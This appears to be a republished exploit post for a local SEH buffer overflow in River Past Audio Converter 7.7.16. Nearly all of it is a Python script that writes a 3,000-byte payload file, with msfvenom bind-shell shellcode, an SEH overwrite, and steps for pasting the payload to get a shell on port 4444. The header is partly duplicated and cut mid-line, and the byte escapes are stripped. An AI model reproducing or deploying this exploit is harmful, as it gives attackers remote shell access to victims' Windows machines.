River Past Audio Converter 7.7.16 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 330

# Exploit Title: River_Past_Audio_Converter - Buffer Overflow (SEH)
# Date: 06.02.2019
# Vendor Homepage: www.riverpast.com
# Software Link: https://en.softonic.com/download/river-past- # Exploit Title: River_Past_Audio_Converter - Buffer Overflow (SEH)
# Date: 06.02.2019
# Vendor Homepage: www.riverpast.com
# Software Link: https://en.softonic.com/download/river-past-audio-converter/windows/post-download?sl=3D1
# Exploit Author: Matteo Malvica
# Tested Version: 7.7.16
# Tested on: Windows 10 - 10.0.17134.1
# Vulnerability Type: Local Buffer Overflow (SEH)
#
# Steps:
# 1.- Run python code : River_Past_Audio_Converter.py
# 2.- Open carbonara.txt and copy content to clipboard
# 3.- Open River_PastAudio_Converter.exe and click on the 'Options' inside fhe 'File' menu.
# 4.- Paste the content of carbonara.txt into the 'Lame_enc.dll' name field.
# 5.- Click 'OK' and you will have a bind shell listening on port 4444.

import socket
import struct

#msfvenom -p windows/shell_bind_tcp LPORT=4444 -a x86 -b 'x00x0dx0ax42' -f python
shellcode = ""
shellcode += "x31xc9x83xe9xaexe8xffxffxffxffxc0x5ex81"
shellcode += "x76x0exbaxfex4dxccx83xeexfcxe2xf4x46x16"
shellcode += "xcfxccxbaxfex2dx45x5fxcfx8dxa8x31xaex7d"
shellcode += "x47xe8xf2xc6x9exaex75x3fxe4xb5x49x07xea"
shellcode += "x8bx01xe1xf0xdbx82x4fxe0x9ax3fx82xc1xbb"
shellcode += "x39xafx3exe8xa9xc6x9exaax75x07xf0x31xb2"
shellcode += "x5cxb4x59xb6x4cx1dxebx75x14xecxbbx2dxc6"
shellcode += "x85xa2x1dx77x85x31xcaxc6xcdx6cxcfxb2x60"
shellcode += "x7bx31x40xcdx7dxc6xadxb9x4cxfdx30x34x81"
shellcode += "x83x69xb9x5exa6xc6x94x9exffx9exaax31xf2"
shellcode += "x06x47xe2xe2x4cx1fx31xfaxc6xcdx6ax77x09"
shellcode += "xe8x9exa5x16xadxe3xa4x1cx33x5axa1x12x96"
shellcode += "x31xecxa6x41xe7x96x7exfexbaxfex25xbbxc9"
shellcode += "xccx12x98xd2xb2x3axeaxbdx01x98x74x2axff"
shellcode += "x4dxccx93x3ax19x9cxd2xd7xcdxa7xbax01x98"
shellcode += "xa6xb2xa7x1dx2ex47xbex1dx8cxeax96xa7xc3"
shellcode += "x65x1exb2x19x2dx96x4fxccxabxa2xc4x2axd0"
shellcode += "xeex1bx9bxd2x3cx96xfbxddx01x98x9bxd2x49"
shellcode += "xa4xf4x45x01x98x9bxd2x8axa1xf7x5bx01x98"
shellcode += "x9bx2dx96x38xa2xf7x9fxb2x19xd2x9dx20xa8"
shellcode += "xbax77xaex9bxedxa9x7cx3axd0xecx14x9ax58"
shellcode += "x03x2bx0bxfexdax71xcdxbbx73x09xe8xaax38"
shellcode += "x4dx88xeexaex1bx9axecxb8x1bx82xecxa8x1e"
shellcode += "x9axd2x87x81xf3x3cx01x98x45x5axb0x1bx8a"
shellcode += "x45xcex25xc4x3dxe3x2dx33x6fx45xbdx79x18"
shellcode += "xa8x25x6ax2fx43xd0x33x6fxc2x4bxb0xb0x7e"
shellcode += "xb6x2cxcfxfbxf6x8bxa9x8cx22xa6xbaxadxb2"
shellcode += "x19"

padding="x21"*280
nseh = "xEBx12x90x90"
seh = struct.pack('<L',0x10011977) # 10011977 # POP POP RET
rest = "x24" * (3000-len(padding)-len(shellcode)-4)
nops = "x90x90x90x90"

payload = padding + nseh + seh + nops * 16 + shellcode + rest

try:
f=open("carbonara.txt","w")
print "[+] Creating %s bytes pasta payload.." %len(payload)
f.write(payload)
f.close()
print "[+] Carbonara created!"

except:
print "Carbonara cannot be created"